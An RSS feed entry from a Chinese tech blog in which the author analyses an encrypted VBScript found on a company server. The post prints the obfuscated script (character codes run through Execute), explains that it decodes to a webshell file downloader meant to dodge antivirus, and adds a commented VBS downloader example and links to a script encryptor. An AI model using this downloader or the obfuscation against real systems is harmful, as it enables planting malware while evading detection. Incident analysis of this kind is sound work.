<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>奋斗博客 &#187; VBScript</title>
	<atom:link href="http://www.fendou.info/tag/vbscript/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.fendou.info</link>
	<description>WordPress&#124;SEO&#124;Web&#124;Linux&#124;Windows&#124;Android</description>
	<lastBuildDate>Sat, 04 Feb 2012 13:56:15 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>VBS代码加密解密</title>
		<link>http://www.fendou.info/vbs-code-encode-and-unencode/</link>
		<comments>http://www.fendou.info/vbs-code-encode-and-unencode/#comments</comments>
		<pubDate>Thu, 28 Jan 2010 11:00:15 +0000</pubDate>
		<dc:creator>dev</dc:creator>
				<category><![CDATA[操作系统]]></category>
		<category><![CDATA[VBS]]></category>
		<category><![CDATA[VBScript]]></category>
		<category><![CDATA[webshell]]></category>
		<category><![CDATA[加密]]></category>
		<category><![CDATA[工具下载]]></category>
		<category><![CDATA[解密]]></category>

		<guid isPermaLink="false">http://www.fendou.info/?p=848</guid>
		<description><![CDATA[今天无意中在公司服务器系统盘根目录下发现了一个可疑的vbs脚本。打开看看发现vbs代码是加密的，这更加证明这个脚本的可疑。

我对vbs代码只能算是了解，能看懂，但是编却编不出来。为了解密这个vbs代码，用搜索引擎搜索了半天，找到好多相关的资料，发现原来vbs如此强大。以这篇文章收集vbs代码供以后学习。 <a href="http://www.fendou.info/vbs-code-encode-and-unencode/">继续阅读 <span class="meta-nav">&#8594;</span></a><table class="wumii-related-items" cellspacing="0" cellpadding="3" border="0"  style="clear: both;">
    
    <tr>
        <td colspan="5"><b><font size="-1"  style="display: block !important; padding: 20px 0 5px !important;"></font></b></td>
    </tr>
    
        <tr>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important;">
                    <a target="_blank" title="VBS代码收集" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-collect%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/11/20/11181867.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">VBS代码收集</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="vbs脚本实现普通用户以管理员权限运行程序" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.fendou.info%2Fvbs-run-software-as-administrator%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9293898.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">vbs脚本实现普通用户以管理员权限运行程序</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="VBS脚本得到CPU使用率，硬盘使用率和内存使用率" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.fendou.info%2Fvbs-get-cpu-harddisk-ram-rate%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/12/09/12114386.gif" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">VBS脚本得到CPU使用率，硬盘使用率和内存使用率</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="解密被加密的wordpress主题" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.fendou.info%2Fto-decrypt-encrypted-wordpress-themes%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/11/23/11350651.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">解密被加密的wordpress主题</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="XP 双开3389工具" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.fendou.info%2Fxp-open-3389-tool%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2012/02/04/14760404.png" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">XP 双开3389工具</font>
                    </a>
                </td>
        </tr>
    
    <tr>
        <td colspan="5" align="right">
            <a style="text-decoration: none !important;" href="http://www.wumii.com/widget/relatedItems.htm" target="_blank" title="无觅相关文章插件">
                <font size="-1" color="#bbbbbb" style="display: block !important; font-family: arial !important; padding: 5px 0 !important; font-size: 12px !important; color: #bbb !important;">无觅</font>
            </a>
        </td>
    </tr>
</table>]]></description>
			<content:encoded><![CDATA[<p>今天无意中在公司服务器系统盘根目录下发现了一个可疑的vbs脚本。打开看看发现vbs代码是加密的，这更加证明这个脚本的可疑。</p>
<p>我对vbs代码只能算是了解，能看懂，但是编却编不出来。为了解密这个vbs代码，用搜索引擎搜索了半天，找到好多相关的资料，发现原来vbs如此强大。以这篇文章收集vbs代码供以后学习。</p>
<p>简单介绍一下什么是vbs。VBScript是Visual Basic Script的简称，有时也被缩写为VBS。VBScript是微软开发的一种脚本语言，可以看作是VB语言的简化版，与VBA的关系也非常密切。</p>
<p>它具有原语言容易学习的特性。目前这种语言广泛应用于网页和ASP程序制作，同时还可以直接作为一个可执行程序。用于调试简单的VB语句非常方便。<span id="more-848"></span></p>
<p>下面是我发现的可疑代码</p>

<div class="wp_syntax"><div class="code"><pre class="vbscript" style="font-family:monospace;">Str=Array(97,108,61,76,67,97,115,101,40,87,83,99,114,105,112,116,46,65,114,103,117,109,101,110,116,115,40,49,41,41,13,10,116,101,61,76,67,97,115,101,40,87,83,99,114,105,112,116,46,65,114,103,117,109,101,110,116,115,40,48,41,41,13,10,83,101,116,32,120,80,111,115,116,61,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,41,13,10,120,80,111,115,116,46,79,112,101,110,32,34,71,69,84,34,44,116,101,44,48,13,10,120,80,111,115,116,46,83,101,110,100,40,41,13,10,83,101,116,32,101,116,61,67,114,101,97,116,101,79,98,106,101,99,116,40,34,65,68,79,68,66,46,83,116,114,101,97,109,34,41,13,10,101,116,46,77,111,100,101,61,51,13,10,101,116,46,84,121,112,101,61,49,13,10,101,116,46,79,112,101,110,40,41,13,10,101,116,46,87,114,105,116,101,40,120,80,111,115,116,46,114,101,115,112,111,110,115,101,66,111,100,121,41,13,10,101,116,46,83,97,118,101,84,111,70,105,108,101,32,97,108,44,50)
Function Num2Str(Str):For I=0 To UBound(Str):Num2Str=Num2Str &amp; Chr(Str(I)):Next:End Function
Execute Num2Str(Str)</pre></div></div>

<p>看到这段代码让我想起前几天<a href="http://www.fendou.info/wordpress/to-decrypt-encrypted-wordpress-themes.html">解密了一个wordpress主题文件</a>。从加密的结构上看差不多，前面是加密的字符串，后面跟着加密的算法，虽然语言不同，但是可以用类似的方法去解决。在网上搜索相关的vbs语法后直接用 msgbox替换掉 Execute并运行，未加密的vbs代码直接弹了出来</p>
<p><a href="http://www.fendou.info/wp-content/uploads/2010/01/vbs.png" rel="lightbox[848]"><img src="http://www.fendou.info/wp-content/uploads/2010/01/vbs.png" alt="" title="vbs" width="418" height="290" class="aligncenter size-full wp-image-852" /></a></p>
<p>解密出来的代码原来是webshell提权用的vbs脚本，作用就是可以下载任意文件到网站的服务器上。加密是为了躲过杀毒软件的查杀。</p>
<p>说到webshell执行vbs脚本下载文件，其实有好多方法，举个例子(可能被有些杀毒软件当成病毒)：</p>

<div class="wp_syntax"><div class="code"><pre class="vbscript" style="font-family:monospace;">url = &quot;http://127.0.0.1/test.exe&quot; '网络上的文件地址或者程序  
saveas = &quot;x.exe&quot; '保存成的本地文件或者名字（自定义）  
Set xmlhttp = CreateObject(&quot;Microsoft.XMLHTTP&quot;) '创建HTTP请求对象  
Set stream = CreateObject(&quot;ADODB.Stream&quot;) '创建ADO数据流对象  
&nbsp;
Call xmlhttp.open(&quot;GET&quot;,url,False)'打开连接  
Call xmlhttp.send()'发送请求  
&nbsp;
stream.mode = 3 '设置数据流为读写模式  
stream.type = 1 '设置数据流为二进制模式  
Call stream.open()'打开数据流  
Call stream.write(xmlhttp.responsebody)'将服务器的返回报文主体内容写入数据流  
Call stream.savetofile(saveas,2)'将数据流保存为文件  
&nbsp;
'释放对象  
Set xmlhttp = Nothing  
Set stream = Nothing  
dim a '定义a变量  
set a=CreateObject(&quot;Wscript.Shell&quot;) '暂时屏蔽 创建应用脚本程序</pre></div></div>

<p>上面那个可疑脚本的加密方式可以很好的躲过杀毒软件，在网上找到个类似的vbs脚本加密软件，加密出来的效果跟那个加密代码差不多。<a href="http://www.fendou.info/x/vbs/vbs-encode.rar">vbs脚本加密器下载</a>   <a href="http://www.fendou.info/x/vbs/vbs-compile.rar">vbs脚本编辑器(vbs转换成exe)下载</a></p>
<p><strong>VBS代码收集</strong></p>
<p>唉！代码太多了，另起一篇吧！</p>
<table class="wumii-related-items" cellspacing="0" cellpadding="3" border="0"  style="clear: both;">
    
    <tr>
        <td colspan="5"><b><font size="-1"  style="display: block !important; padding: 20px 0 5px !important;"></font></b></td>
    </tr>
    
        <tr>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important;">
                    <a target="_blank" title="VBS代码收集" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-collect%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/11/20/11181867.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">VBS代码收集</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="vbs脚本实现普通用户以管理员权限运行程序" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.fendou.info%2Fvbs-run-software-as-administrator%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9293898.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">vbs脚本实现普通用户以管理员权限运行程序</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="VBS脚本得到CPU使用率，硬盘使用率和内存使用率" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.fendou.info%2Fvbs-get-cpu-harddisk-ram-rate%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/12/09/12114386.gif" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">VBS脚本得到CPU使用率，硬盘使用率和内存使用率</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="解密被加密的wordpress主题" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.fendou.info%2Fto-decrypt-encrypted-wordpress-themes%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/11/23/11350651.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">解密被加密的wordpress主题</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="XP 双开3389工具" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect.htm?url=http%3A%2F%2Fwww.fendou.info%2Fxp-open-3389-tool%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2012/02/04/14760404.png" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">XP 双开3389工具</font>
                    </a>
                </td>
        </tr>
    
    <tr>
        <td colspan="5" align="right">
            <a style="text-decoration: none !important;" href="http://www.wumii.com/widget/relatedItems.htm" target="_blank" title="无觅相关文章插件">
                <font size="-1" color="#bbbbbb" style="display: block !important; font-family: arial !important; padding: 5px 0 !important; font-size: 12px !important; color: #bbb !important;">无觅</font>
            </a>
        </td>
    </tr>
</table>]]></content:encoded>
			<wfw:commentRss>http://www.fendou.info/vbs-code-encode-and-unencode/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
	</channel>
</rss>

